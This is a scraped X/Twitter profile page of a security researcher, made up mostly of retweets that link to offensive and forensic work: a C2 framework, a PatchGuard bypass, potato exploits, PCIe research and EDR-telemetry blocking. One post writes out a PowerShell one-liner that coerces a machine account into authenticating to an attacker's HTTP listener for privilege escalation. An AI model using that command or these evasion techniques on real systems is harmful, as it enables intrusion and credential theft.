Naacbin

158 posts

Naacbin

Naacbin

@naacbin

Maldev, forensic and reverse makes me happy.

Katılım Ekim 2018
159 Takip Edilen165 Takipçiler
Naacbin retweetledi
5pider
5pider@C5pider·
I haven't posted anything about Havoc in a while so imma share something I have been working on. Wrote a custom VM/Interpreter (based on the RISC-V instruction set) to execute exploits and other arbitrary code. The client is now fully extendable and scriptable via the Python API
5pider tweet media5pider tweet media5pider tweet media5pider tweet media
English
29
78
542
71.4K
Naacbin retweetledi
Can Bölük
Can Bölük@_can1357·
Excited to share my latest article: PgC - a novel approach to disable Patchguard during runtime using basic memory management principles. It has worked against every version of Patchguard for the last 7 years, without needing any updates! blog.can.ac/2024/06/28/pgc…
English
14
122
326
46.9K
Naacbin retweetledi
S3cur3Th1sSh1t
S3cur3Th1sSh1t@ShitSecure·
Didn't check the code yet, but looks like SilverPotato and CertifiedDCOM have a working public weaponized tool by now: github.com/CICADA8-Resear… That's huge news from my perspective🔥
English
5
151
397
27.7K
Naacbin retweetledi
Geebz
Geebz@Gbps111·
I just published the long-awaited Part 2 to my PCIe blog post series - "All About Memory: MMIO, DMA, TLPs, and more!" This post also includes a companion experiment where I dive into what pcileech looks like over a PCIe protocol analyzer. Please enjoy! ctf.re/kernel/pcie/tu…
English
4
63
202
27.7K
Naacbin retweetledi
k1nd0ne
k1nd0ne@k1nd0ne·
Exciting news: VolWeb 2.0 is out! This digital forensics memory analysis platform leverages the capabilities of @volatility 3 framework. With significant enhancements, it now offers improved flexibility and scalability! github.com/k1nd0ne/VolWeb. 1/8
English
4
73
138
14.3K
Naacbin retweetledi
Elliot
Elliot@ElliotKillick·
I just spent the last few months of my life reverse engineering the Windows 10 parallel loader and figuring out how it does concurrency. Updates have now been published! github.com/ElliotKillick/…
English
3
47
161
11.5K
Naacbin
Naacbin@naacbin·
Over the past few months, I've contributed on the github.com/mandiant/VM-Pa… repository to incorporate forensic packages. As a result, I've developed scripts to automate VM installation for reverse, maldev and forensic purposes. 👇 github.com/naacbin/SecLab
English
0
12
59
3.5K
Naacbin retweetledi
Naacbin retweetledi
Kévin GERVOT (Mizu)
Kévin GERVOT (Mizu)@kevin_mizu·
Challenge time is now over ⏰ TL;DR - HTML injection - Axios DOM Based CSPP - Axios CSPP response overwrite gadget - jQuery DOM Clobbering + CSPP selector overwrite gadgets - Setting src attr to "javascript:" for each HTML node ➝ XSS Detailed writeup 👇 mizu.re/post/intigriti…
Kévin GERVOT (Mizu)@kevin_mizu

GG to all the solvers! However, no one solved it in the intended way :p Before giving my solution, I'm extending the challenge for another week with a fixed version! If you find the solution, please send me a DM 📮 The challenge is accessible here 👇 mizu.re:3000

English
0
13
79
15.7K
Naacbin retweetledi
Mayfly
Mayfly@M4yFly·
Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system ? Simply use: powershell iwr http://192.168.56.1 -UseDefaultCredentials To get an HTTP coerce of the machine account. 👇🧵
Mayfly tweet media
English
8
219
773
78.8K
Naacbin retweetledi
an0n
an0n@an0n_r0·
OST cannot be stopped. Here is a technique we tested internally 9 months ago: blocking EDR telemetry by leveraging the Windows Filtering Platform. Considered it so evil that we didn't publish it that time. It was pointless, now here it is by @netero_1010: github.com/netero1010/EDR…
English
11
270
871
125.7K
vx-underground
vx-underground@vxunderground·
Our friend @whid_ninja hooked us up with a Hardware Hacking Offensive Security training + exam. It comes with a bunch of super cool tools too =D *Winner must disclose their home address to receive the package in the mail Comment below to win:) Course: whid.ninja/store/product/…
English
494
50
451
70.2K
Naacbin retweetledi
Fox-IT
Fox-IT@foxit·
Read our latest blog to find out how our Security Research Team reverse-engineered Windows Defender to uncover previously undocumented artefacts, which can now be recovered using Dissect! blog.fox-it.com/2023/12/14/rev…
English
1
41
76
9K
Kévin GERVOT (Mizu)
Kévin GERVOT (Mizu)@kevin_mizu·
Excited to launch my first browser extension, DOMLogger++! Now available for both Firefox and Chromium! 🎉 DOMLogger++ allows you to monitor, intercept, and debug JavaScript sinks based on customizable configurations 🔥 Check it out 👇 github.com/kevin-mizu/dom… 1/5
English
9
106
337
42.4K